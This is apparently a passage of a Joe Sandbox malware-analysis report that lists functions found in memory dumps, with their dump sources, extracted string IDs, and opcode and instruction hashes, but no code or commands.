                                            Function 0A0A6B28 Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f2545776e106c417294718b69c894c174915888ada5f839721dcf9ad91a06f20
                                            • Instruction ID: fd31484327d14e620d67525b3eb9a8a7dec0b38294afff054e5fc8623b0da77c
                                            • Opcode Fuzzy Hash: f2545776e106c417294718b69c894c174915888ada5f839721dcf9ad91a06f20
                                            • Instruction Fuzzy Hash: E7D11830E14B1A9ACB11EB68D9546DDB7B1FF99300F60D79AE40937221EB706AC5CB90
                                            Function 029AA598 Relevance: .2, Instructions: 223COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1548ade3d77717c29c8fccc3857e9c6236455e2c33d69bc76583b03ea2f03397
                                            • Instruction ID: 739cfcaad9200d5a60581ec1f87992e37690d33bded761d2dffd31c4ade32102
                                            • Opcode Fuzzy Hash: 1548ade3d77717c29c8fccc3857e9c6236455e2c33d69bc76583b03ea2f03397
                                            • Instruction Fuzzy Hash: 84C167B1C987459BD310CF26E9882A93BB1FBC5324FD34B19D1616B2E4D7B4146ACF44
                                            Function 09986428 Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3188e8d35d48ab82487c730460f8c163f99f97cdbdd720cfd190e4f686038cf3
                                            • Instruction ID: c5018137170c04fe66c5a4004fe052c577196a2ec4c435ab75105ece15725819
                                            • Opcode Fuzzy Hash: 3188e8d35d48ab82487c730460f8c163f99f97cdbdd720cfd190e4f686038cf3
                                            • Instruction Fuzzy Hash: 08616F70E042198FDB19DF69D5445AEBBF2FF89300F24816AD408EB265DB349D45CFA1
                                            Function 028E8C29 Relevance: .2, Instructions: 160COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac9bebe5ab0db5fe9b7ffa7d58af30c6b0b6cf7abcc18a8c85e1356600fb6353
                                            • Instruction ID: 5b13342a6c43372f266adc0669f03b937845a5a2cf030497bdfe810fd6f47b5f
                                            • Opcode Fuzzy Hash: ac9bebe5ab0db5fe9b7ffa7d58af30c6b0b6cf7abcc18a8c85e1356600fb6353
                                            • Instruction Fuzzy Hash: 1C71A078E052558FDB14CF69C980AAEFBF2FF89304F24C1A9D449A7265DB305941CF51
                                            Function 028E8C70 Relevance: .2, Instructions: 155COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93909c1a582e35a940fc41a841d776155baf97cc3e678b290682aa75dbc0f1a5
                                            • Instruction ID: 6e63f156729e9b5b79246e8e910ed035eabb82ba649c426042cbf564bbca5676
                                            • Opcode Fuzzy Hash: 93909c1a582e35a940fc41a841d776155baf97cc3e678b290682aa75dbc0f1a5
                                            • Instruction Fuzzy Hash: FF614B78E152198FDF14CF69C980AAEFBB2FF89304F24C1A9D419A7255DB309A41CF61
                                            Function 028E92A5 Relevance: .1, Instructions: 141COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4da06cd1a52a961ebe68d85b3f5ef35cd0b5d26e4b5bbc01de171b8c25585580
                                            • Instruction ID: 19b96c8795cc9747dfce4def348e7b8d7a7e155ab781110b49f5c19c6814bbc0
                                            • Opcode Fuzzy Hash: 4da06cd1a52a961ebe68d85b3f5ef35cd0b5d26e4b5bbc01de171b8c25585580
                                            • Instruction Fuzzy Hash: 21617D78E082598FCB14CF69C980A9EFBF2BF89304F14C1AAD449A7266D7349D41CF61
                                            Function 028E92D0 Relevance: .1, Instructions: 140COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce93100be765f446126a952e846bdae7681fa1a4c40b600aac5b93810ca11c0f
                                            • Instruction ID: bdd9ccae788c028f2c1bb462c6ae9a6e2cce153171f7d51c377fea93f632eb10
                                            • Opcode Fuzzy Hash: ce93100be765f446126a952e846bdae7681fa1a4c40b600aac5b93810ca11c0f
                                            • Instruction Fuzzy Hash: 0A512978E142298FDB54CF69C980A9EFBB2FF89304F14C1AAD409A7365D7349A41CF61
                                            Function 09986DC0 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191424250.0000000009980000.00000040.00000800.00020000.00000000.sdmp, Offset: 09980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9980000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d8ad58567e4854a76daa81667d91e57e44712b566a8c1264890687a916c7bac
                                            • Instruction ID: 55320be198664e4e1a219a0f57b7482ae600fcb6d84052076f5abb6b97ef1af2
                                            • Opcode Fuzzy Hash: 4d8ad58567e4854a76daa81667d91e57e44712b566a8c1264890687a916c7bac
                                            • Instruction Fuzzy Hash: C9510B70E002198FDB18DFA9C5849AEFBF2FF89304F24C16AD418AB255DB359941CF60
                                            Function 028E56A8 Relevance: .1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e76febeebb7d4cc9dd33ff19898cb685990f7d84f02bd626325ecf84adbd8058
                                            • Instruction ID: 95c02a6654fc8dc515aeb31978f3c9717640745507aa2580ade84c649f319cdd
                                            • Opcode Fuzzy Hash: e76febeebb7d4cc9dd33ff19898cb685990f7d84f02bd626325ecf84adbd8058
                                            • Instruction Fuzzy Hash: 52510778E0520ADBCF14CFAAC8815AEFBF2AF89308F64D46AC415E7254D3389651CF94
                                            Function 028E56B8 Relevance: .1, Instructions: 125COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 07c226c674ea3739e6e09b7f0b1c8e0e45fc4053691a1906864f5d9b927b60b6
                                            • Instruction ID: 940138445c95fec8ad551ea62e8425392d5e579a6387bb70fd83c52863c5d008
                                            • Opcode Fuzzy Hash: 07c226c674ea3739e6e09b7f0b1c8e0e45fc4053691a1906864f5d9b927b60b6
                                            • Instruction Fuzzy Hash: 98510778E0560ACBCF14CFAAC8815AEFBF2BF89308F64D46AC415E6254D3389651CF94
                                            Function 028E5DAA Relevance: .1, Instructions: 114COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185563960.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_28e0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f6bc2befbab64c3a549d58bf2bcf137a5b42b0a88c45b8004dc8ae1993232dba
                                            • Instruction ID: 956538d32a52015a2a1787429d33f97a3e3f73ea98360b078d46634a3b388644
                                            • Opcode Fuzzy Hash: f6bc2befbab64c3a549d58bf2bcf137a5b42b0a88c45b8004dc8ae1993232dba
                                            • Instruction Fuzzy Hash: CB417B75E056598FDB18CF6B8C4469DFBF3AFC9300F14C1BA850CAA265DB3419868F11
                                            Function 029AD208 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ca5a742d5e9444ce69e0c881e2317e2af853691f84b6643ffdbc5907366378f
                                            • Instruction ID: 29e73a41ef05fbad3ae1dedcdd6c727799b1d73918abe8e3774273bea5314e6b
                                            • Opcode Fuzzy Hash: 3ca5a742d5e9444ce69e0c881e2317e2af853691f84b6643ffdbc5907366378f
                                            • Instruction Fuzzy Hash: 78319AB9D012589FCB10CFA9E984ADEFBF5BB49310F24942AE804B7310D735A945CFA4
                                            Function 029AB09C Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2185889999.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_29a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09054ff782bf500d9d1c15003e862503247a365551f8e22b65e496aa8c51ab84
                                            • Instruction ID: e7ca812c5b3c42a708079452469fd6e65e60eb71bd645cc60180aa27b9998305
                                            • Opcode Fuzzy Hash: 09054ff782bf500d9d1c15003e862503247a365551f8e22b65e496aa8c51ab84
                                            • Instruction Fuzzy Hash: 83319AB9D012189FCB10CFA9D984A9EFBF5BB49310F14942AE804B7310D375A945CFA4
                                            Function 0A0A4DE0 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a73ae2ca0a9501f5ce8a3e7dffa25c45aa29a953999cdfe3ba06912254f92832
                                            • Instruction ID: 15fa1646341f3fe69480c9758aa604dd85290b3b4e6e4a1fd052416fdd7c75fc
                                            • Opcode Fuzzy Hash: a73ae2ca0a9501f5ce8a3e7dffa25c45aa29a953999cdfe3ba06912254f92832
                                            • Instruction Fuzzy Hash: C121E5B1E116199BEB58CFAAD8806DEFBF7BBC8210F14C03AD518A7214EB7059018B95
                                            Function 0A0ADE68 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e112798b3206138cc3598978a1f5eb48c98b25d18f82b6f2242edd590df65c8
                                            • Instruction ID: 4c1764eb827cacb1e9f70bb86d0399a069da4fdb41de8881ddc87a3911ef93a5
                                            • Opcode Fuzzy Hash: 7e112798b3206138cc3598978a1f5eb48c98b25d18f82b6f2242edd590df65c8
                                            • Instruction Fuzzy Hash: 47112971E116199BDB58CFABE8406DEFBF7EBC8210F14C03AD518A7214EB305A058F91
                                            Function 0A0A4DD0 Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d38e6a4c0daa58656f3145d3fd84b5760a7966a332411ac3715b2845593df54a
                                            • Instruction ID: ee9a51678b17bebb7c602deab135b57f23231556724ee586d734940ead4aead1
                                            • Opcode Fuzzy Hash: d38e6a4c0daa58656f3145d3fd84b5760a7966a332411ac3715b2845593df54a
                                            • Instruction Fuzzy Hash: 2521F7B0E116199BDB48CFAAD8446DEFAF7BFC8200F14C17AD408A7254EB7449418B95
                                            Function 0A0A6374 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c78e001a7cf1aae8d4a39a5ef77050dcfff4d8c20785b26f47a587743e7d8ff8
                                            • Instruction ID: 48bb3d3afba7d4cc70f7d102a69d30e7c27484818ce8fc6edc040491c6eeeaef
                                            • Opcode Fuzzy Hash: c78e001a7cf1aae8d4a39a5ef77050dcfff4d8c20785b26f47a587743e7d8ff8
                                            • Instruction Fuzzy Hash: BA0166B5D0521D9F8B14CFA9D4418EEFBF2AB5A310F14A16AE804B3310E7359951CFA8
                                            Function 0A0A6380 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2191637289.000000000A0A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a0a0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
                                            • Instruction ID: 62827beca9e988c4fdf5fa5d8c31ff1b4c84fbcfcc3c658b3f41ccb0fba1580d
                                            • Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
                                            • Instruction Fuzzy Hash: 4DF042B5D0520C9F8F04DFA9D5418EEFBF2AB5A310F14A16AE814B3310E73599518FA8

                                            Executed Functions

                                            Function 0319B328 Relevance: 6.6, Strings: 5, Instructions: 362COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: 3b576fc9b5cb70eda96a7153ebb40a6d078840623879911713a7f52b2779edc1
                                            • Instruction ID: 1eabacd4f691c30da1b1dcc8f1a791092182ff549ad427848a759f37145b2d7b
                                            • Opcode Fuzzy Hash: 3b576fc9b5cb70eda96a7153ebb40a6d078840623879911713a7f52b2779edc1
                                            • Instruction Fuzzy Hash: 60E1E875A04618DFEF14CFA9D884A9DBBB2FF49310F15C0AAE819AB261D730A941CF51
                                            Function 0319C470 Relevance: 6.5, Strings: 5, Instructions: 202COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: adf65c7523f9eaa9b9a7851ee263c844a9ddc4853234c25059c8abd72a21d7c8
                                            • Instruction ID: 7b662705bf22574cdd0f585129bf4132ab163b6316615db48da5bba0e1df7e86
                                            • Opcode Fuzzy Hash: adf65c7523f9eaa9b9a7851ee263c844a9ddc4853234c25059c8abd72a21d7c8
                                            • Instruction Fuzzy Hash: D391C274E00208DFEF14DFA9D984AADBBF2BF89300F14916AE459AB365DB349941CF50
                                            Function 0319C190 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: 4e5645e0fea1eef762b9f01e43d9b09ec4aeddefc4066d990ba4498e195d2f6b
                                            • Instruction ID: 53259db409297750257ef4a28f1ba9adc617efc6624a45ff9769d95368f3d123
                                            • Opcode Fuzzy Hash: 4e5645e0fea1eef762b9f01e43d9b09ec4aeddefc4066d990ba4498e195d2f6b
                                            • Instruction Fuzzy Hash: B6919474E00218DFEB14DFAAD884A9DBBF2FF89300F15816AE459AB365DB349941CF50
                                            Function 0319BEB0 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: a98171069277e988694a058d6a245945eac5e66818df66d06eb520b87673d8df
                                            • Instruction ID: e0bd0ff5287f5174131c51ead75d693768f73402144dcd53d1378d84206cb474
                                            • Opcode Fuzzy Hash: a98171069277e988694a058d6a245945eac5e66818df66d06eb520b87673d8df
                                            • Instruction Fuzzy Hash: 0B91A174E00208DFEB14DFAAD984A9DBBF2FF89300F15816AD419AB365DB349981CF50
                                            Function 0319C751 Relevance: 6.4, Strings: 5, Instructions: 195COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: d3db8406610fceecc624474c62bfab423957dda403c9d70108e1e964e706dbe5
                                            • Instruction ID: 7e9b3923d5f92f6203933d5d17b5469f372c86f77d6a63c6ebaae1dcff550266
                                            • Opcode Fuzzy Hash: d3db8406610fceecc624474c62bfab423957dda403c9d70108e1e964e706dbe5
                                            • Instruction Fuzzy Hash: 2781C274E012189FEF14DFA9D984A9DBBF2BF89300F14C06AE859AB365DB349941CF50
                                            Function 03194AD9 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: e4ef4e9c13476801f762f9d4734b7200bc2964a1bfd074ecd85f2bf5474a46c3
                                            • Instruction ID: 732a5eb69627944ed4b05049b0ac817a13bf39207b421703ed6af56903a537a1
                                            • Opcode Fuzzy Hash: e4ef4e9c13476801f762f9d4734b7200bc2964a1bfd074ecd85f2bf5474a46c3
                                            • Instruction Fuzzy Hash: AD819574E01218DFEB54DFAAD984A9DBBF2BF88300F15C06AD419AB365DB349942CF50
                                            Function 0319CA31 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: c56a6ba8ac20ae2f349d38001bcfa4d6f0fd16b89c40068e6eb7872e3c7d46b3
                                            • Instruction ID: f3c06c35af87867e387a436f4157b3e7cdd833c180ef6479084fea4f1a339173
                                            • Opcode Fuzzy Hash: c56a6ba8ac20ae2f349d38001bcfa4d6f0fd16b89c40068e6eb7872e3c7d46b3
                                            • Instruction Fuzzy Hash: 4381A474E00218DFEB14DFA9D994A9EBBF2BF88300F15C06AE859AB355DB349941CF50
                                            Function 0319BBD3 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
                                            • API String ID: 0-3391486992
                                            • Opcode ID: b80186c69c6ed9b301e5369e368521a2e69086e4d81f6849230826f53c600be2
                                            • Instruction ID: 855fb1b7ad72e05509d74f11f79899f6718fb2c5143921d30ea6999fad8ae9c8
                                            • Opcode Fuzzy Hash: b80186c69c6ed9b301e5369e368521a2e69086e4d81f6849230826f53c600be2
                                            • Instruction Fuzzy Hash: 5781B374E05218DFEB18DFAAD884A9DBBF2BF89304F14C06AD419AB365DB349941CF50
                                            Function 03196730 Relevance: 5.4, Strings: 4, Instructions: 443COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$(ocq$,gq$,gq
                                            • API String ID: 0-2401767512
                                            • Opcode ID: e5a827e0b032ed20514b74293c1727c167976782a9966ade05b6e72634f46b37
                                            • Instruction ID: 5a90bebd426eec2363a55c3cd85715bf11dc4010eba8f84c95fd3ea5d02e7344
                                            • Opcode Fuzzy Hash: e5a827e0b032ed20514b74293c1727c167976782a9966ade05b6e72634f46b37
                                            • Instruction Fuzzy Hash: D5022E71A00219DFDF14CF69C984AADBBB6FF8C360F19806AE405AB265D734ED41CB61
                                            Function 0319B4F3 Relevance: 3.9, Strings: 3, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0oFp$PHcq$PHcq
                                            • API String ID: 0-775545523
                                            • Opcode ID: ae4764d907da8c101d1773bb88314b9a0537ea473adedf45779ab4debad8da94
                                            • Instruction ID: bddae3021e566515c5e82fc63eeddbf758e4dad8f13b5067f13d2c68b0dddf6b
                                            • Opcode Fuzzy Hash: ae4764d907da8c101d1773bb88314b9a0537ea473adedf45779ab4debad8da94
                                            • Instruction Fuzzy Hash: 64618274E046089FEF18DFAAD984A9EBBF2BF89300F14C16AD419AB365DB345941CF50
                                            Function 03199858 Relevance: 3.4, Strings: 2, Instructions: 863COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$4'cq
                                            • API String ID: 0-3004416391
                                            • Opcode ID: f3781685c9303245dce3c5a133aed60f3fe01c8c40606bb74047a592ac0c295b
                                            • Instruction ID: 237c43dfaf6825e5aa9af2b485f5c22497b7d6bf40e6d29d0a897df81c4ece2b
                                            • Opcode Fuzzy Hash: f3781685c9303245dce3c5a133aed60f3fe01c8c40606bb74047a592ac0c295b
                                            • Instruction Fuzzy Hash: C2726571A00209DFDF15DF68C984AAEBBF6FF4C310F15856AE8059B2A5D730E985CB90
                                            Function 03196108 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$Hgq
                                            • API String ID: 0-2239030825
                                            • Opcode ID: e274489f3c8bf8739c2b19ee6b357d6417c437d651028b48a310d10dd0a086ff
                                            • Instruction ID: 880b7db9023c4d2c5636fe89450eec12c50068a6a59f6b9e60670a71c1c53db9
                                            • Opcode Fuzzy Hash: e274489f3c8bf8739c2b19ee6b357d6417c437d651028b48a310d10dd0a086ff
                                            • Instruction Fuzzy Hash: 3112A070A002199FDB18DF69C954AAEBBF6FF88310F14806AE505DB395DB349D81CBA0
                                            Function 03196E58 Relevance: 10.5, Strings: 8, Instructions: 498COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
                                            • API String ID: 0-3338910979
                                            • Opcode ID: 9318fb4741822c3d281cb0ab3ae985893962d4ad13d594440db7cd777a16e001
                                            • Instruction ID: 925f001c520ad36718d808767a77cc5efd871572bfdd9bd6bebf854d3b3beff6
                                            • Opcode Fuzzy Hash: 9318fb4741822c3d281cb0ab3ae985893962d4ad13d594440db7cd777a16e001
                                            • Instruction Fuzzy Hash: 01222830A106098FDF15DF69D884A9EBBF6FF8D314F1985AAE8059B2A1D730ED41CB50
                                            Function 031977F0 Relevance: 3.2, Strings: 2, Instructions: 699COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2269345339.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Offset: 03190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_3190000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $cq$$cq
                                            • API String ID: 0-2695052418
                                            • Opcode ID: f42db77c0f7049295ed7d8ae80fdc05960c04f1897320d957bf3d3bd09fa758c
                                            • Instruction ID: 890ce0bb77421660dc7b3d163c48a27df88f69cd998e96e15d666ee2a6a589a7
                                            • Opcode Fuzzy Hash: f42db77c0f7049295ed7d8ae80fdc05960c04f1897320d957bf3d3bd09fa758c
                                            • Instruction Fuzzy Hash: 3E521274A002198FEB55DBA4C860BAEBB77FF98300F5080AAC10A7B355DB359D85DF61
